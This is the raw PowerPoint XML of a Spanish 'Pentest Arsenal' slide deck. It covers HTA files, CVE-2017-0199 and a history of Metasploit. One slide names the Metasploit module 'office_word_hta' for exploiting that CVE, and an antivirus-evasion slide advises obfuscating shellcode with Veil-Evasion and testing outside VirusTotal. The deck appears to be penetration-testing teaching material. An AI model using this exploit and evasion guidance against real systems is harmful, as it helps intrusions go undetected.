                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IE 5. </a:t>
            </a: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Estos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archivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comunmente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utilizados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por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> virus para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>actualizar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> claves del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>registro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a: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Básicamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplicación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTA que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sirve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código</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dinámico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soporta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lenguajes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de scripting de IE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>como</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> VBScript y JS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estos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archivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejecutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tomar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en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cuenta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modelo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navegador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hecho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejecutan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como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aplicaciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>totalmente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confiables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”.</a:t>
            </a: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La CVE-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017-0199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fue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descubierta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por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ingenería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inversa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>muestras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>público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por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de FireEye.</a:t>
            </a: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000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>También</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>puede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explotar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf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solamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileformat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office_word_hta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1650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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Av</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>evasion</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="HACKED" panose="020005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44288" y="2301551"/>
            <a:ext cx="1030635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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lleva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tiempo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ofuscar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encodear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Usar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PEscrambler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (Veil-Evasion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Probar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> VMs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>propias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> y no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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5591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575" y="0"/>
            <a:ext cx="7726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0404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029" y="0"/>
            <a:ext cx="49959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812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860" y="0"/>
            <a:ext cx="91602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966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434" y="0"/>
            <a:ext cx="93131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215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339"/>
            <a:ext cx="12192000" cy="666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581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66" y="0"/>
            <a:ext cx="102760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1675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44" y="0"/>
            <a:ext cx="110669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753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825" y="0"/>
            <a:ext cx="820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7367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038" y="0"/>
            <a:ext cx="9169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1155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UY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6" y="0"/>
            <a:ext cx="12124884" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35714178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UY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350" y="0"/>
            <a:ext cx="6267449" cy="6806419"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27571635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01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9501" y="0"/>
            <a:ext cx="9144000" cy="1115736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Preguntas 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99501" y="5429076"/>
            <a:ext cx="9144000" cy="1344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UY" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Gracias 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03177" y="6353873"/>
            <a:ext cx="4188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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://github.com/guillermo85/presentaciones.git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6465" y="6337349"/>
            <a:ext cx="4188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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guillermo.rodriguez@intradosti.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="795462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" y="541176"/>
            <a:ext cx="12179319" cy="577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96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329" y="66675"/>
            <a:ext cx="9576846" cy="6792140"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324819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2488" y="1354666"/>
            <a:ext cx="5698213" cy="488156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UY" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t> fue creado por H.D. Moore en el 2003, como una herramienta de red portátil usando el lenguaje Perl. El 21 de octubre de 2009, el Proyecto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t> anunció que había sido adquirida por Rapid7, una empresa de seguridad que ofrece soluciones unificadas de gestión de vulnerabilidades.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67" y="963774"/>
            <a:ext cx="38227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61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62" y="0"/>
            <a:ext cx="104974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9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1254</TotalTime>
  <Words>1289</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>187</Paragraphs>
  <Slides>56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HACKED</vt:lpstr>
      <vt:lpstr>Ubuntu</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Pentest Arsenal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Preguntas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Pentest Arsenal</dc:title>
  <dc:creator>Guillermo Rodriguez</dc:creator>
  <cp:lastModifiedBy>Guillermo Rodriguez</cp:lastModifiedBy>
  <cp:revision>35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-24T01:22:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-04T18:48:44Z</dcterms:modified>
</cp:coreProperties>
</file>